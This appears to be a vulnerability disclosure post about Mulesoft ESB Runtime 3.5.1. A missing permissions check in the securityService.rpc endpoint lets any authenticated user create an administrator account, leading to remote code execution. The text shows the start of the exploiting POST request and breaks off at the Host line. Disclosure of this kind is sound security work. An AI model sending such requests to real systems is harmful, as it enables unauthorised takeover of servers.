Posted by Brandon Perry on Oct 22

Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code
Execution

Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.

POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1

Host:…